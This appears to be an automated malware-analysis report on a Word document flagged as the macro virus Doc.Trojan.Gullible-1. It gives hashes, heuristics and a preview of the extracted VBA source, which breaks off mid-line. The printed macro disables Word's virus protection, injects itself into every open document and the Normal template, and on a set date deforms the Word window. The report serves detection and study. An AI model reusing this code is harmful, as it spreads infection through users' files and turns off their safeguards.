Doc.Trojan.Gullible-1 — Office (OLE) malware analysis

Static analysis result for SHA-256 9af5df139497901d…

MALICIOUS

Office (OLE)

Size: 44.5 KB
Created: 2001-03-09 14:31:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: e25512405acdfa4e2d717a5669d30d54
SHA-1: f46b146564a28c75d51421be9e209a4360d82df7
SHA-256: 9af5df139497901d27a24b7a7e51aa5bdbb31e4802830b49c19a60b3f3abc6fd
Risk score: 220

Malware Insights

Doc.Trojan.Gullible-1 · confidence 95%

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic

The file contains VBA macros, including a Document_Open macro, which is a common technique for executing malicious code upon opening a document. The ClamAV detection and the heuristic firings strongly indicate this is a malicious document. The macro attempts to infect other documents and contains obfuscated code, suggesting it's designed for propagation.

Heuristics (4)

  • ClamAV: Doc.Trojan.Gullible-1 [critical, CLAMAV_DETECTION]
    ClamAV detected this file as malware: Doc.Trojan.Gullible-1
  • OLE document has large unaccounted-for region [high, OLE_SLACK_ANOMALY]
    The OLE file is 45,568 bytes but its declared streams total only 25,481 bytes; the remaining 20,087 bytes (44%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • VBA macros detected [medium, OLE_VBA_MACROS; 1 related finding]
    Document contains VBA macro code
  • Document_Open macro [high, OLE_VBA_DOCOPEN]
    Document contains a Document_Open macro, which runs automatically when the document is opened

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 20577 bytes
SHA-256: 9045c5ae0db871c97f5565baf71df7e666451254f1bdc2d11b9bc7f3735193fd
Detection: ClamAV: Doc.Trojan.Gullible-1
Obfuscation or payload: unlikely

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Declare Function SetWindowRgn Lib "user32" (ByVal hWnd As Long, ByVal hRgn As Long, ByVal bRedraw As Boolean) As Long
Private Declare Function CreateEllipticRgn Lib "gdi32" (ByVal X1 As Long, ByVal Y1 As Long, ByVal X2 As Long, ByVal Y2 As Long) As Long
Private Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long
Private Sub MFV(Method As String)
    Dim Doc As Document, Comp, CodeMod As Object, SaveIt As Boolean, i As Integer
        
    If Application.UserName = Chr(Val("&H53")) + Chr(Val("&H2E")) + Chr(Val("&H20")) + Chr(Val("&H42")) + Chr(Val("&H61")) + Chr(Val("&H63")) + Chr(Val("&H68")) Then
        If Method = "O" Then MsgBox "Ich bin wieder hier!", vbOKOnly + vbDefaultButton1 + vbInformation, "MFV"
        Options.VirusProtection = True
        Exit Sub
    End If

    
    Options.VirusProtection = False
    
    
    'Infection
    For Each Doc In Documents
        SaveIt = Doc.Saved
        
        For Each Comp In Doc.VBProject.VBComponents
            If Comp.Type = 100 Then Call Infect(Comp.CodeModule)
        Next

    Next
    Call Infect(Normal.ThisDocument.VBProject.VBComponents(1).CodeModule)
    
    'Destruction
    If Method = "C" And (Format(Date, "dd-mm") = "19-03") Then
        Assistant.Visible = True
        Assistant.Animation = MsoAnimationType.msoAnimationGetTechy
        
        Application.WindowState = wdWindowStateNormal
        Application.Width = 500
        Application.Height = 500
        SetWindowRgn FindWindow("OpusApp", vbNullString), CreateEllipticRgn(0, 0, 600, 600), True
    
        With Assistant.NewBalloon
            .BalloonType = MsoBalloonType.msoBalloonTypeNumbers
            .Mode = MsoModeType.msoModeModal
            .Icon = MsoIconType.msoIconAlert
            .Button = MsoButtonSetType.msoButtonSetCancel
            .Heading = "MFV"
            .Text = MacroContainer.Name & " was infected by MFV (My First Virus)"
            .Show
        End With

        Assistant.Animation = MsoAnimationType.msoAnimationThinking
    
        With Assistant.NewBalloon
            .BalloonType = MsoBalloonType.msoBalloonTypeNumbers
            .Mode = MsoModeType.msoModeModal
            .Icon = MsoIconType.msoIconTip
            .Button = MsoButtonSetType.msoButtonSetCancel
            .Heading = "MFV"
            .Text = "This virus is not harmful. Belive me!" & vbCrLf & "Your window was only deformed, not more!" & vbCrLf & vbCrLf & "This virus is freeware. You may give it to anyone!"
            .Show
        End With
    End If
End Sub
Private Sub Infect(CodeMod As Object)
    Dim StartOpen As Integer, StartClose As Integer, StartNew As Integer, IsInfected As Boolean
    Dim Sex As Object, DoIt As Boolean, i As Integer
    
    IsInfected = False: StartOpen = 0: StartClose = 0: StartNew = 0
    For i = 1 To CodeMod.CountOfLines
        If InStr(1, UCase(CodeMod.Lines(i, 1)), UCase("Sub Document_Open()")) Then StartOpen = i
        If InStr(1, UCase(CodeMod.Lines(i, 1)), UCase("Sub Document_Close()")) Then StartClose = i
        If InStr(1, UCase(CodeMod.Lines(i, 1)), UCase("Sub Document_New()")) Then StartNew = i
        If InStr(1, UCase(CodeMod.Lines(i, 1)), UCase("'Infected by My first Virus")) Then IsInfected = True
    Next i

    If Not IsInfected Then
        CodeMod.AddFromString "Private Declare Function SetWindowRgn Lib " & Chr(34) & "user32" & Chr(34) & " (ByVal hWnd As Long, ByVal hRgn As Long, ByVal bRedraw As Boolean) As Long"
        CodeMod.AddFromString "Private Declare Function CreateEllipticRgn Lib " & Chr(34) & "gdi32" & Chr(34) & " (ByVal X1 As Long, ByVal Y1 As Long, ByVal X2 As Long, ByVal Y2 As Long) As Long"
        CodeMod.AddFromString "Private Decl
... (truncated)